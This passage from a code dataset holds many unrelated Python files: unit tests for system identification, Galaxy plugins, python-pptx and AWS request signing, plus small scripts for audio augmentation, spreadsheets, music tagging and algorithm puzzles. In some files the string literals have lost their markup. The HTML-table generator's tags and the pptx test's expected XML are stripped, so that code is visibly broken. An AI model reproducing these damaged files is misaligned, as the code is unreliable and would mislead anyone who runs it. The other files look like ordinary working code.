sysid.prbs(1000)\n prbs2 = sysid.prbs(1000)\n\n def f_prbs_2d(t, x, i):\n \"input function\"\n #pylint: disable=unused-argument\n i = i % 1000\n return 2 * np.array([[prbs1[i]-0.5], [prbs2[i]-0.5]])\n tf = 8\n data = ss2.simulate(\n f_u=f_prbs_2d,\n x0 =np.array([[0, 0, 0]]).T,\n tf=tf)\n ss2_id = sysid.subspace_det_algo1(\n y=data.y, u=data.u,\n f=5, p=5, s_tol=0.1, dt=ss2.dt)\n data_id = ss2_id.simulate(\n f_u=f_prbs_2d,\n # x0=np.array(np.matrix(np.zeros(ss2_id.A.shape[0])).T),\n x0=np.array([np.zeros(ss2_id.A.shape[0])]).T,\n tf=tf)\n\n nrms = sysid.nrms(data_id.y, data.y)\n self.assertGreater(nrms, 0.9)\n\n if ENABLE_PLOTTING:\n for i in range(2):\n plt.figure()\n plt.plot(data_id.t.T, data_id.y[i, :].T,\n label='$y_{:d}$ true'.format(i))\n plt.plot(data.t.T, data.y[i, :].T,\n label='$y_{:d}$ id'.format(i))\n plt.legend()\n plt.grid()\n\n def test_subspace_det_algo1_mimo2(self):\n tf = 36 * 8\n dt = 1\n in_size = 5\n out_size = 2\n data_u = np.random.randn(in_size, tf)\n data_y = np.random.randn(out_size, tf)\n print(\"data_u.shape: {}, data_y.shape: {}\".format(data_u.shape, data_y.shape))\n print(\"MIMO [{} IN, {} OUT], {} time-steps.\".format(data_u.shape[0], data_y.shape[0], data_u.shape[1]))\n\n def 
f_prbs_4d(t, x, i):\n            return np.array([data_u[:, i]]).T\n\n        start_time = time.time()  # Serial\n        ss3_id = sysid.subspace_det_algo1(y=data_y, u=data_u,\n                                          f=5,  # 5 Forward steps\n                                          p=5,  # 5 Backward steps\n                                          s_tol=0.01,  # 0.2\n                                          dt=dt,\n                                          order=-1)\n        print(\"--- Serial:\\t\\t{} seconds\".format(time.time() - start_time))\n        data3_id = ss3_id.simulate(\n            f_u=f_prbs_4d,\n            x0=np.array([np.zeros(ss3_id.A.shape[0])]).T,\n            tf=tf)\n        print('fit {:f}%'.format(100 * sysid.subspace.nrms(data3_id.y, data_y[:, -1:])))\n\n\n    def test_subspace_det_algo1_mimo3(self):\n        tf = 365 * 8\n        dt = 1\n        in_size = 50\n        out_size = 5\n        data_u = np.random.randn(in_size, tf)\n        data_y = np.random.randn(out_size, tf)\n        print(\"data_u.shape: {}, data_y.shape: {}\".format(data_u.shape, data_y.shape))\n        print(\"MIMO [{} IN, {} OUT], {} time-steps.\".format(data_u.shape[0], data_y.shape[0], data_u.shape[1]))\n\n        def f_prbs_4d(t, x, i):\n            return np.array([data_u[:, i]]).T\n\n        start_time = time.time()  # Serial\n        ss3_id = sysid.subspace_det_algo1(y=data_y, u=data_u,\n                                          f=5,  # 5 Forward steps\n                                          p=5,  # 5 Backward steps\n                                          s_tol=0.01,  # 0.2\n                                          dt=dt,\n                                          order=-1)\n        print(\"--- Serial:\\t\\t{} seconds\".format(time.time() - start_time))\n        data3_id = ss3_id.simulate(\n            f_u=f_prbs_4d,\n            x0=np.array([np.zeros(ss3_id.A.shape[0])]).T,\n            tf=tf)\n        print('fit {:f}%'.format(100 * sysid.subspace.nrms(data3_id.y, data_y[:, -1:])))\n\nif __name__ == \"__main__\":\n    unittest.main()\n\n# vim: set et ft=python fenc=utf-8 ff=unix sts=4 sw=4 ts=4 :\n","sub_path":"sysid/test_subspace.py","file_name":"test_subspace.py","file_ext":"py","file_size_in_byte":7893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"452975658","text":"import os\nfrom random import sample\nimport sys\n\ndef choose(seedNumber):\n\twith open('v92.finalResult', 'r') as f:\n\t\tlines = f.readlines()\n\ttitle = lines[0]\n\tlines = lines[1:]\n\tsubLines = sample(lines, seedNumber)\n\twith open('v92.finalResult_' + str(seedNumber), 'w+') as f:\n\t\tf.write(title)\n\t\tfor line in subLines:\n\t\t\tf.write(line)\n\ndef main():\n\tseedNumber = int(sys.argv[1])\n\tchoose(seedNumber)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"bkscripts/choose_seed_distribution.py","file_name":"choose_seed_distribution.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"116483250","text":"import math\n\ndef solution(gems):\n    cl=0\n    cr=0\n    \n    gem_list = set(gems)\n    gem_num = len(gem_list)\n    \n    gem_dict = zip(list(gem_list),[i for i in range(gem_num)])\n    gem_dict = dict(gem_dict)\n    # print(gem_dict)\n    \n    gem_list = [0 for _ in range(gem_num)]\n    \n    # print(gem_list)\n    \n    \n    gems = [''] +gems\n    N = len(gems)\n    \n    gem_cnt =0\n    ans =[]\n    \n    min_len = math.inf\n    \n    while(1):\n        if gem_cnt < gem_num:\n            cr += 1\n            \n            if(cr == N): # stop once the right pointer runs past the end\n                break\n            \n            if gem_list[gem_dict[gems[cr]]] == 0: # a new kind of gem\n                gem_cnt += 1\n\n            gem_list[gem_dict[gems[cr]]] += 1 # pick up the gem\n\n        else:\n            cl += 1\n            \n            gem_list[gem_dict[gems[cl]]] -= 1 # drop the gem\n            \n            if gem_list[gem_dict[gems[cl]]] == 0: # dropped the last gem of that kind\n                gem_cnt -= 1\n            \n            \n        if gem_cnt == gem_num and (cr-cl) < min_len: # minimum window so far\n            min_len= cr-cl\n            ans = [cl+1,cr]\n        \n#         print(gem_list)\n#         print(gem_cnt)    \n    \n    # print(ans)\n    \n    return ans","sub_path":"대회,기출/카카오_2020_보석쇼핑.py","file_name":"카카오_2020_보석쇼핑.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"104778654","text":"import asyncio\nimport json\n\nfrom galaxy.api.plugin import Plugin\nfrom galaxy.api.consts import Platform\n\ndef test_get_capabilites(reader, writer, read, write):\n class PluginImpl(Plugin): #pylint: disable=abstract-method\n async def get_owned_games(self):\n pass\n\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"3\",\n \"method\": \"get_capabilities\"\n }\n token = \"token\"\n plugin = PluginImpl(Platform.Generic, \"0.1\", reader, writer, token)\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n response = json.loads(write.call_args[0][0])\n assert response == {\n \"jsonrpc\": \"2.0\",\n \"id\": \"3\",\n \"result\": {\n \"platform_name\": \"generic\",\n \"features\": [\n \"ImportOwnedGames\"\n ],\n \"token\": token\n }\n }\n\ndef test_shutdown(plugin, read, write):\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"5\",\n \"method\": \"shutdown\"\n }\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n plugin.shutdown.assert_called_with()\n response = json.loads(write.call_args[0][0])\n assert response == {\n \"jsonrpc\": \"2.0\",\n \"id\": \"5\",\n \"result\": None\n }\n\ndef test_ping(plugin, read, write):\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"7\",\n \"method\": \"ping\"\n }\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n response = json.loads(write.call_args[0][0])\n assert response == {\n \"jsonrpc\": \"2.0\",\n \"id\": \"7\",\n \"result\": None\n }\n\ndef test_tick_before_handshake(plugin, read):\n read.side_effect = [b\"\"]\n asyncio.run(plugin.run())\n plugin.tick.assert_not_called()\n\ndef test_tick_after_handshake(plugin, read):\n request = {\n \"jsonrpc\": \"2.0\",\n \"id\": \"6\",\n \"method\": \"initialize_cache\",\n \"params\": {\"data\": {}}\n }\n read.side_effect = [json.dumps(request).encode() + b\"\\n\", b\"\"]\n asyncio.run(plugin.run())\n plugin.tick.assert_called_with()\n","sub_path":"tests/test_internal.py","file_name":"test_internal.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"459467569","text":"import os\nimport argparse\nimport json\n\nimport pandas as pd\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('voice_dir')\nparser.add_argument('json_file')\nparser.add_argument('--min_duration', type=int, default=0)\nparser.add_argument('--max_duration', type=int, default=1000)\nparser.add_argument('--test_size', type=float, default=0.2)\nparser.add_argument('--random_state', type=int, default=42)\n\nif __name__=='__main__':\n args = parser.parse_args()\n\n parent_dir = os.path.dirname(args.json_file)\n text_dir = os.path.join(parent_dir, 'transcribe')\n if not os.path.isdir(text_dir):\n os.mkdir(text_dir)\n text_dir = os.path.abspath(text_dir)\n voice_dir = os.path.abspath(args.voice_dir)\n\n with open(args.json_file) as f:\n data = f.readlines()\n \n voices = []\n texts = []\n\n for line in tqdm(data):\n conf = json.loads(line)\n text = conf['text']\n voice = conf['key']\n duration = conf['duration']\n if duration > args.min_duration and duration < args.max_duration:\n vp = os.path.join(voice_dir, voice[37:])\n tp = os.path.join(text_dir, voice[37:-4].replace('/','_')+'.txt')\n with open(tp, 'w') as f:\n f.write(text)\n voices.append(vp)\n texts.append(tp)\n\n train_voice, test_voice, 
train_text, test_text = train_test_split(\n voices, texts, \n test_size=args.test_size,\n random_state=args.random_state\n )\n\n train_df = pd.DataFrame({'voice':train_voice, 'text':train_text})\n test_df = pd.DataFrame({'voice':test_voice, 'text':test_text})\n\n train_df.to_csv(os.path.join(parent_dir,'train_manifest.csv'), header=False, index=False)\n test_df.to_csv(os.path.join(parent_dir,'test_manifest.csv'), header=False, index=False)","sub_path":"data/infore.py","file_name":"infore.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"585440445","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport json\nfrom datetime import date\n\nhoy=date.today()\n\nf = json.load(open(\"anuncios_as_\"+str(hoy)+\".json\"))\ng = json.load(open(\"rir_asns.json\"))\n# h = open(\"asns_\"+str(hoy)+\".html\", \"w\")\n# h.write(\"asn|rir|pfx_afrinic|pfx_apnic|pfx_lacnic|pfx_ripencc|pfx_arin
\")\nk = open(\"test_asns.html\", \"w\")\n\ntabla = ''\n\nfor i in f:\n afrinic = f[i][0]\n apnic = f[i][1]\n lacnic = f[i][2]\n ripe = f[i][3]\n arin = f[i][4]\n for j in g:\n if i in g[j]:\n rir = j\n # h.write(\"\"+str(i)+\"\"+\"|\"+str(rir)+\"|\"+str(afrinic)+\"|\"+str(apnic)+\"|\"+str(lacnic)+\"|\"+str(ripe)+\"|\"+str(arin)+\"
\")\n tabla = tabla + ''\n # print i, rir, afrinic, apnic, lacnic, ripe, arin\n\ntabla = tabla + '
ASNRIRAfrinic prefixApnic prefixLACNIC prefixRipe prefixArin prefix
'+str(i)+'
'+str(rir)+'
'+str(afrinic)+'
'+str(apnic)+'
'+str(lacnic)+'
'+str(ripe)+'
'+str(arin)+'
'\n\nk.write('Title
'+tabla+'
')\nk.close()\n","sub_path":"tabla_asns.py","file_name":"tabla_asns.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"555732176","text":"import numpy as np\nfrom scipy.io.wavfile import write\nimport librosa\nimport os\n\npath = \"deletethis\" #or whichever source folder\nos.chdir(path)\n\ndef load_audio_file(file_path):\n input_length = 1159168 \n data = librosa.core.load(file_path)[0] \n if len(data)>input_length:\n data = data[:input_length]\n else:\n data = np.pad(data, (0, max(0, input_length - len(data))), \"constant\")\n return data\n\ndef stretch(data, rate=1):\n input_length = 1159168\n data = librosa.effects.time_stretch(data, rate)\n if len(data)>input_length:\n data = data[:input_length]\n else:\n data = np.pad(data, (0, max(0, input_length - len(data))), \"constant\")\n\n return data\n\ndef manipulate(data, sampling_rate, pitch_factor):\n return librosa.effects.pitch_shift(data, sampling_rate, pitch_factor)\n\naudio_files = os.listdir()\n\nfor file in audio_files:\n name, ext = os.path.splitext(file)\n data = load_audio_file(file)\n wn = np.random.randn(len(data))\n data_wn1 = data + 0.005*wn\n write(\"andthis/{0}_wn1.wav\".format(name), 24100, data_wn1)\n data_roll1 = np.roll(data, 1600)\n write(\"andthis/{0}_roll1.wav\".format(name), 24100, data_roll1)\n data_stretch =stretch(data, 0.8)\n write(\"andthis/{0}_stretch1.wav\".format(name), 24100, data_stretch)\n data_stretch2 =stretch(data, 1.2)\n write(\"andthis/{0}_stretch2.wav\".format(name), 24100, data_stretch2)\n data_wn2 = data + 0.0009*wn\n write(\"andthis/{0}_wn2.wav\".format(name), 24100, data_wn2)\n data_roll2 = np.roll(data, 90000)\n write(\"andthis/{0}_roll2.wav\".format(name), 24100, data_roll2)\n data_pitch1 = manipulate(data, 24100, 0.1)\n write(\"andthis/{0}_pitch1.wav\".format(name), 24100, data_pitch1)\n data_pitch2 = manipulate(data, 24100, 0.2)\n write(\"andthis/{0}_pitch2.wav\".format(name), 24100, data_pitch2)","sub_path":"data_aug.py","file_name":"data_aug.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"549843901","text":"from support import *\r\n\r\ndef get_file():\r\n nums=[]\r\n with open(\"100_nums.txt\",'r') as in_file:\r\n for line in in_file:\r\n nums.append(int(line))\r\n return nums\r\n \r\nprint(add_list(get_file()))\r\n","sub_path":"p13.py","file_name":"p13.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"367785317","text":"class Solution(object):\n def maximumSwap(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n A = [int(c) for c in str(num)]\n if len(A) <= 1: return num\n m = len(A)\n nextG = [0] * m # next greater's index\n mx, mxidx = A[m-1], m - 1\n for i in xrange(m - 1, -1, -1):\n if mx >= A[i]:\n nextG[i] = mxidx\n else:\n nextG[i] = -1\n mx = A[i]\n mxidx = i\n\n ret = list(A)\n for i in xrange(m):\n if nextG[i] == -1: continue\n j = nextG[i]\n A[i], A[j] = A[j], A[i]\n if A > ret:\n ret = list(A)\n A[i], A[j] = A[j], A[i]\n return int(''.join([str(c) for c in ret]))\n","sub_path":"LC670.py","file_name":"LC670.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"65408106","text":"from Domain.obiect import getLocatie, creeazaObiect, getId, getNume, getDescriere, getPret\n\ndef 
mutareObiecte(substringLocatieVeche, lista, locatieNoua):\n    '''\n    Move all the objects from one location to another.\n    :param substringLocatieVeche: the string by which the old location is looked up\n    :param lista: the list of objects\n    :param locatieNoua: the new location\n    :return: the list in which the objects belonging to the given location have been moved to the other location\n    '''\n\n    listaNoua=[]\n    for obiect in lista:\n        if substringLocatieVeche==getLocatie(obiect):\n            obiectNou=creeazaObiect(\n                getId(obiect),\n                getNume(obiect),\n                getDescriere(obiect),\n                getPret(obiect),\n                getLocatie(obiect).replace(getLocatie(obiect), locatieNoua)\n            )\n            listaNoua.append(obiectNou)\n        else:\n            listaNoua.append(obiect)\n    return listaNoua\n\ndef concatenare(text, lista, pret):\n    '''\n    Append a given string to the descriptions of all objects priced above a given value\n    :param text: the string to be appended to the descriptions of objects whose price exceeds the given value\n    :param lista: the list of objects\n    :param pret: the value each object's price is compared against to decide whether its description is modified\n    :return: a new list in which the descriptions of all objects priced above the given value have been modified by appending the string\n    '''\n    listaNoua=[]\n    for obiect in lista:\n        if getPret(obiect)>pret:\n            obiectNou=creeazaObiect(\n                getId(obiect),\n                getNume(obiect),\n                getDescriere(obiect) + str(text),\n                getPret(obiect),\n                getLocatie(obiect)\n            )\n            listaNoua.append(obiectNou)\n        else:\n            listaNoua.append(obiect)\n    return listaNoua\n\n\ndef PretMaximLocatie(lista):\n    '''\n    Determine the highest price for each location\n    :param lista: the list of objects\n    :return: a dictionary with the highest price for each location\n    '''\n    rezultat={}\n    for obiect in lista:\n        locatie=getLocatie(obiect)\n        if locatie in rezultat:\n            if getPret(obiect)>rezultat[locatie]:\n                rezultat[locatie]=getPret(obiect)\n        else:\n            rezultat[locatie]=getPret(obiect)\n    return rezultat\n\ndef OrdonareDupaPret(lista):\n    '''\n    Sort the objects in ascending order by purchase price.\n    :param lista: the list of objects\n    :return: the objects sorted in ascending order by purchase price\n    '''\n    return sorted(lista, key=lambda obiect: getPret(obiect))\n\ndef sumaPreturilor(lista):\n    '''\n    Display the sums of the prices for each location.\n    :param lista: the list of objects\n    :return: the sum of the prices for each location\n    '''\n    rezultat={}\n    for obiect in lista:\n        locatie=getLocatie(obiect)\n        if locatie in rezultat:\n            rezultat[locatie]=rezultat[locatie]+getPret(obiect)\n        else:\n            rezultat[locatie]=getPret(obiect)\n    return rezultat\n\n","sub_path":"Logic/funct.py","file_name":"funct.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"139916138","text":"# encoding: utf-8\n\n\"\"\"Test suite for pptx.oxml.graphfrm module.\"\"\"\n\nfrom __future__ import absolute_import\n\nfrom hamcrest import assert_that, equal_to, is_\n\nfrom pptx.oxml.ns import nsdecls, qn\nfrom pptx.oxml.shapes.graphfrm import CT_GraphicalObjectFrame\n\nfrom ...unitutil import TestCase\n\n\nclass TestCT_GraphicalObjectFrame(TestCase):\n    \"\"\"Test CT_GraphicalObjectFrame\"\"\"\n    def test_has_table_return_value(self):\n        \"\"\"CT_GraphicalObjectFrame.has_table property has correct value\"\"\"\n        # setup ------------------------\n        id_, name = 9, 'Table 8'\n        left, top, width, height = 111, 222, 333, 444\n        tbl_uri = 'http://schemas.openxmlformats.org/drawingml/2006/table'\n        chart_uri = 
'http://schemas.openxmlformats.org/drawingml/2006/chart'\n graphicFrame = CT_GraphicalObjectFrame.new_graphicFrame(\n id_, name, left, top, width, height)\n graphicData = graphicFrame[qn('a:graphic')].graphicData\n # verify -----------------------\n graphicData.set('uri', tbl_uri)\n assert_that(graphicFrame.has_table, is_(equal_to(True)))\n graphicData.set('uri', chart_uri)\n assert_that(graphicFrame.has_table, is_(equal_to(False)))\n\n def test_new_graphicFrame_generates_correct_xml(self):\n \"\"\"CT_GraphicalObjectFrame.new_graphicFrame() returns correct XML\"\"\"\n # setup ------------------------\n id_, name = 9, 'Table 8'\n left, top, width, height = 111, 222, 333, 444\n xml = (\n '\\n \\n \\n \\n \\n \\n \\n <'\n '/p:nvGraphicFramePr>\\n \\n \\n '\n ' \\n \\n \\n \\n \\n\\n' %\n (nsdecls('a', 'p'), id_, name, left, top, width, height)\n )\n # exercise ---------------------\n graphicFrame = CT_GraphicalObjectFrame.new_graphicFrame(\n id_, name, left, top, width, height)\n # verify -----------------------\n self.assertEqualLineByLine(xml, graphicFrame)\n\n def test_new_table_generates_correct_xml(self):\n \"\"\"CT_GraphicalObjectFrame.new_table() returns correct XML\"\"\"\n # setup ------------------------\n id_, name = 9, 'Table 8'\n rows, cols = 2, 3\n left, top, width, height = 111, 222, 334, 445\n xml = (\n '\\n \\n \\n \\n \\n \\n \\n '\n ' \\n \\n \\n'\n ' \\n \\n \\n \\n \\n \\n {5C22544A-7EE6-4342-B048-85BDC9'\n 'FD1C3A}\\n \\n \\n \\n \\n \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n \\n \\n \\n \\n \\n \\n <'\n 'a:bodyPr/>\\n \\n \\n '\n ' \\n \\n '\n '\\n \\n \\n \\n '\n ' \\n \\n \\n \\n \\n '\n ' \\n \\n \\n '\n ' \\n \\n \\n \\n \\n '\n ' \\n \\n \\n <'\n 'a:txBody>\\n \\n \\n \\n \\n \\n \\n \\n \\n '\n ' \\n \\n\\n' %\n (nsdecls('a', 'p'), id_, name, left, top, width, height)\n )\n # exercise ---------------------\n graphicFrame = CT_GraphicalObjectFrame.new_table(\n id_, name, rows, cols, left, top, width, height)\n # verify -----------------------\n self.assertEqualLineByLine(xml, graphicFrame)\n","sub_path":"tests/oxml/shapes/test_graphfrm.py","file_name":"test_graphfrm.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"90506212","text":"import datetime\nimport json\n\nfrom getting_started.aws_signing import AwsSigningV4\n\nsigner = AwsSigningV4(\n aws_access_key_id=\"access key\",\n aws_secret_access_key=\"secret key\",\n aws_host=\"developer-api.dnb.no\",\n)\n\n\ndef test_aws_signing_get_request(mocker):\n with mocker.patch(\n \"getting_started.aws_signing.now\", return_value=datetime.datetime(2018, 6, 2)\n ):\n headers = signer.create_headers(path=\"/tokens\", method=\"GET\")\n\n assert headers[\"Authorization\"] == (\n \"AWS4-HMAC-SHA256 Credential=access key/20180602/eu-west-1/execute-api/aws4_request, \"\n \"SignedHeaders=host;x-amz-date, \"\n \"Signature=1672f85f04d1375ffc1f91881d4e3ff6a583242fce8c6d92ba15544a63dd4dcb\"\n )\n\n\ndef test_aws_signing_post_request(mocker):\n with mocker.patch(\n \"getting_started.aws_signing.now\", return_value=datetime.datetime(2018, 6, 2)\n ):\n headers = signer.create_headers(\n path=\"/tokens\", method=\"POST\", data=json.dumps({\"ssn\": \"29105573083\"})\n )\n\n assert headers[\"Authorization\"] == (\n \"AWS4-HMAC-SHA256 Credential=access key/20180602/eu-west-1/execute-api/aws4_request, \"\n \"SignedHeaders=host;x-amz-date, \"\n 
\"Signature=1f1eb16d666394ba57522b01db51e1da0f2f272a4b48aba9011e5c4bb8540cac\"\n )\n assert (\n headers[\"x-amz-content-sha256\"]\n == \"b80fb83935fba3770a2436d26c84767b99f487250b6b7505a470153c47ecdcbb\"\n )\n","sub_path":"python/tests/test_aws_signing.py","file_name":"test_aws_signing.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"352161280","text":"\"\"\"\nFind albums or items without MusicBrainz tags.\n\"\"\"\nfrom beets import plugins, ui\n\n\nREGEX = '^(?!\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12})$'\n\n\nclass BrainlessPlugin(plugins.BeetsPlugin):\n def commands(self):\n def func(lib, opts, args):\n query = ui.decargs(args)\n\n if opts.album:\n field = 'mb_albumid'\n else:\n field = 'mb_trackid'\n\n query.append(\"%s::%s\" % (field, REGEX))\n ui.commands.list_items(lib, query, opts.album, opts.fmt)\n\n cmd = ui.Subcommand('brainless',\n help='Find items without MusicBrainz tags')\n cmd.parser.add_option('-a', '--album', action='store_true',\n help='Show matching albums instead of tracks')\n cmd.parser.add_option('-f', '--format', action='store', default='',\n dest='fmt', help='print with custom format')\n cmd.func = func\n return [cmd]\n","sub_path":".config/beets/plugins/brainless.py","file_name":"brainless.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"515466798","text":"from utils.spreadsheets.googlespreadsheet import SpreadSheet\nimport time\n\n\nclass GSpreadManager:\n def __init__(self, sneakers_list):\n self.spread_sheet = SpreadSheet()\n self.sneakers_list = sneakers_list\n\n self.start_index_rows_range = 0\n self.last_sneakers_number = 0\n self.names = []\n self.articles = []\n self.prices = []\n self.sneaker_sizes = []\n self.sneaker_urls = []\n self.sneaker_brands = []\n self.sneaker_image_urls = []\n\n def merge_cells(self):\n for i, sneaker in enumerate(self.sneakers_list):\n sneakers_number = len(sneaker[1])\n print(sneaker[1])\n print(sneaker)\n print(sneakers_number)\n\n self.start_index_rows_range += self.last_sneakers_number\n end_index_rows_range = self.start_index_rows_range + sneakers_number\n\n self.last_sneakers_number = sneakers_number\n\n if sneakers_number > 1:\n # while True:\n # try:\n merged = False\n while not merged:\n try:\n self.spread_sheet.merge_cells((self.start_index_rows_range, end_index_rows_range), 4)\n time.sleep(1.1)\n merged = True\n except Exception as e:\n time.sleep(101)\n\n def get_all_needed_data(self):\n for i, sneaker in enumerate(self.sneakers_list):\n for j, item in enumerate(sneaker[1]):\n price = item[1], url = item[3], article = item[2]\n name = item[0], brand = item[4], image = item[5]\n\n sizes = str(item[-1])\n\n self.prices.append(price)\n self.sneaker_sizes.append(sizes)\n self.articles.append(article)\n self.names.append(name)\n self.sneaker_urls.append(url)\n self.sneaker_brands.append(brand)\n self.sneaker_image_urls.append(image)\n\n #TODO:refactor\n def populate_sheet(self):\n self.merge_cells()\n self.get_all_needed_data()\n\n sneakers_len = str(sum(len(item[1]) for item in self.sneakers_list))\n cell_list_names = self.spread_sheet.sheet.range('A1:A{}'.format(sneakers_len))\n\n for i, val in enumerate(self.names):\n cell_list_names[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_names)\n time.sleep(1)\n ##################################################################################\n cell_list_articles = 
self.spread_sheet.sheet.range('B1:B{}'.format(sneakers_len))\n for i, val in enumerate(self.articles):\n cell_list_articles[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_articles)\n time.sleep(1)\n ##################################################################################\n cell_list_brands = self.spread_sheet.sheet.range('C1:C{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_brands):\n cell_list_brands[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_brands)\n #################################################################################\n cell_list_images = self.spread_sheet.sheet.range('D1:D{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_image_urls):\n formula = '=image(\"{}\")'.format(val)\n cell_list_images[i].value = formula\n\n self.spread_sheet.sheet.update_cells(cell_list_images, value_input_option='USER_ENTERED')\n #################################################################################\n cell_list_prices = self.spread_sheet.sheet.range('E1:E{}'.format(sneakers_len))\n for i, val in enumerate(self.prices):\n cell_list_prices[i].value = str(val)\n\n self.spread_sheet.sheet.update_cells(cell_list_prices)\n time.sleep(1)\n ##################################################################################\n cell_list_urls = self.spread_sheet.sheet.range('F1:F{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_urls):\n cell_list_urls[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_urls)\n ##################################################################################\n cell_list_sizes = self.spread_sheet.sheet.range('G1:G{}'.format(sneakers_len))\n for i, val in enumerate(self.sneaker_sizes):\n cell_list_sizes[i].value = val\n\n self.spread_sheet.sheet.update_cells(cell_list_sizes)\n\n\n","sub_path":"managers/gspreadmanager.py","file_name":"gspreadmanager.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"70338254","text":"from collections import defaultdict\n\nwith open('input.txt', 'r') as f:\n numbers = [int(num) for num in f.read().split()]\n\n\ntree = defaultdict(list)\n\ntotal = 0\n\n\ndef sum_metadata(entries):\n childs = entries[0]\n metadata = entries[1]\n\n entries = entries[2:]\n sum_entires = 0\n\n for i in range(childs):\n sum_node, entries = sum_metadata(entries)\n sum_entires += sum_node\n\n sum_entires += sum(entries[:metadata])\n\n return sum_entires, entries[metadata:]\n\n\ndef root_node_val(entries):\n childs = entries[0]\n metadata = entries[1]\n\n entries = entries[2:]\n child_nodes = []\n\n for i in range(childs):\n child_node_value, entries = root_node_val(entries)\n child_nodes.append(child_node_value)\n\n if childs == 0:\n return sum(entries[:metadata]), entries[metadata:]\n\n return sum(child_nodes[i - 1] for i in entries[:metadata]\n if 1 <= i <= len(child_nodes)), entries[metadata:]\n\n\nfirst_part = sum_metadata(numbers)\nprint('First part: {0}'.format(first_part[0]))\n\nsecond_part = root_node_val(numbers)\nprint('Second part: {0}'.format(second_part[0]))\n","sub_path":"day_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"472502840","text":"import time\nimport numpy as np\nfrom scipy.stats import t\n\n\ndef prob_estimator(game, player, max_err=0.03, min_games=10, max_games=1000, max_time=10 * 60, alpha=0.95, 
verbose=1, random_start=True):\n \"\"\"Runs simulations of game until the expected winning probability for player is estimated with x in such a way that the true probability lays in an interval ]x-max_err, x+max_err[ with probability alpha\"\"\"\n\n n_games = 0\n samples = []\n err = max_err + 1\n win = 0.0\n player = str(player)\n\n start = last = time.time()\n while (err > max_err and 2 * time.time() - start - last <= max_time and n_games < max_games) or n_games < min_games:\n last = time.time()\n result = str(game.run_game(verbose=0, current_player='random' if random_start else None))\n if result == player:\n win = 1.0\n elif result == 'draw':\n win = 0.0\n else:\n win = -1.0\n n_games += 1\n samples.append(win)\n sample_var = np.var(samples, ddof=1)\n if n_games >= min_games:\n err = abs(t.ppf(alpha, n_games - 1) * np.sqrt(sample_var / n_games))\n if verbose > 1:\n print('time: {:.1f}, n_games: {}, error: {:.3f}, exp: {:.3f}'.format(time.time() - start, n_games, err, np.mean(samples)))\n if verbose > 0:\n print('time: {:.1f}, n_games: {}, error: {:.3f}, exp: {:.3f}'.format(time.time() - start, n_games, err, np.mean(samples)))\n return np.mean(samples), err\n","sub_path":"estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"107928188","text":"from Bio import AlignIO\nfrom ..sequence_backmapper.sequence_backmapper import SequenceBackmapper\nimport logging\n\"\"\"Trims MSA data by gap percentage or removing all gaps corresponding to best\nmatching sequence to a reference sequence.\n\nAuthor: Mehari B. Zerihun\n\"\"\"\n\nlogger = logging.getLogger(__name__)\n\nclass MSATrimmerException(Exception):\n \"\"\"Raises exceptions related to MSA trimming\n 